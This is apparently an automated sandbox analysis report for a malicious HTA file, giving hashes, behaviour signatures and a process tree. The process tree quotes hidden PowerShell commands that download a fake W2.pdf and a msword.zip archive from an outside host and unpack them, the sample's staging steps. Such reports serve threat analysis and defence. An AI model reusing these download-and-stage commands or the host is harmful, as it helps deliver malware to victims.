Overview

overview

10

Static

static

1

c2.hta

windows7-x64

8

c2.hta

windows10-2004-x64

10

Analysis

  • max time kernel
    118s
  • max time network
    119s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    07-01-2025 21:32

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    c2.hta

  • Size

    5KB

  • MD5

    cbcdda2a4fece3b9fe71dc53b039762d

  • SHA1

    61113f8d33d3331152a4e627b0720c0ab261fae8

  • SHA256

    30ce460b7556cd59def93926bcd3b3e3e2ff24a66f368c9deed7efe7117d0105

  • SHA512

    1a0ef1c47f793d2ec59601626cb6ea42b2b2a086b79df39facaf1c6d65fe24241be02c8c8c5582199dce965f17fbf81d3f6f11045e3f0a9207a6033f5d255a8c

  • SSDEEP

    96:uMk0YizhV1RgcQVx+P50wMmhtbSOyOsluH3:Ovs1EMx0wFHlYU

Score
8/10
discoveryexecution

Malware Config

Signatures

  • Blocklisted process makes network request 7 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

    Run Powershell and hide display window.

    execution
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 7 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Delays execution with timeout.exe 1 IoCs
    evasion
  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
    adwarespyware
  • Modifies system certificate store 2 TTPs 7 IoCs
    evasionspywaretrojan
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 24 IoCs

Processes

  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\c2.hta"
    1⤵
    • Blocklisted process makes network request
    • System Location Discovery: System Language Discovery
    • Modifies Internet Explorer settings
    • Modifies system certificate store
    • Suspicious use of WriteProcessMemory
    PID:2064
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\temp.bat"
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2556
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/W2.pdf -OutFile C:\Users\Admin\Downloads\W2.pdf"
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2612
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/msword.zip -OutFile C:\Users\Admin\AppData\Local\Temp\msword.zip"
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2716
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -WindowStyle Hidden -Command "Expand-Archive -Path C:\Users\Admin\AppData\Local\Temp\msword.zip -DestinationPath C:\Users\Admin\AppData\Local\Temp\msword -Force"
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:692
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\cleanup.bat"
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2896
      • C:\Windows\SysWOW64\timeout.exe
        timeout /t 10
        3⤵
        • System Location Discovery: System Language Discovery
        • Delays execution with timeout.exe
        PID:2876

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\CabED1F.tmp
    Filesize

    70KB

    MD5

    49aebf8cbd62d92ac215b2923fb1b9f5

    SHA1

    1723be06719828dda65ad804298d0431f6aff976

    SHA256

    b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

    SHA512

    bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\TarED41.tmp
    Filesize

    181KB

    MD5

    4ea6026cf93ec6338144661bf1202cd1

    SHA1

    a1dec9044f750ad887935a01430bf49322fbdcb7

    SHA256

    8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

    SHA512

    6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\cleanup.bat
    Filesize

    134B

    MD5

    cbc2fe81c78c659bf9960af450b9c1a5

    SHA1

    706cc41e15983638a39c0c31444a07f0a9bcfba6

    SHA256

    c728696515308f848dc27799820554f6349604111e4d4535c61d4c8aca61938a

    SHA512

    346bec9a523002149da4139e3d63e831b95af03f2386933a9e99e2ca21e7bc8fd520f59eab2638b02d24d8012d1a762585b8eda8c4b54d55f61fd0dfbbdd925a

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\temp.bat
    Filesize

    3KB

    MD5

    87022bba9db0f800b26d9609acbbcf49

    SHA1

    d7be8cc8d4cffcce0bd7d361037bbe575e49cc6a

    SHA256

    1f6ce0f5cd3793aaea9b3f9de99f04679b8db2f1056532982d835e665006ece7

    SHA512

    b7be35a7a8ef40cf5326efd77eb4a2ee05162b241267695c6927f12340be3720af299d37afb5f02025ef8948e71c8a4f8cc21b5c805c9dd777797694c033d53f

    Download Submit

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
    Filesize

    7KB

    MD5

    0eae271729729451f34153871e4e46da

    SHA1

    1dd622bf722e28d32a7b32702e9e2de04016ff7b

    SHA256

    f5a27f41172842bd651c6920ae645187e527cffdb5b5fef91ee92474be88735c

    SHA512

    bac69bbc472f3df8fca3c2a6993d358225e2c1d6aa4ce7415382213148caab10a63e29261d7367915ec53c497d9b3e33637e178edf27036af7bdaaff33622a0e

    Download Submit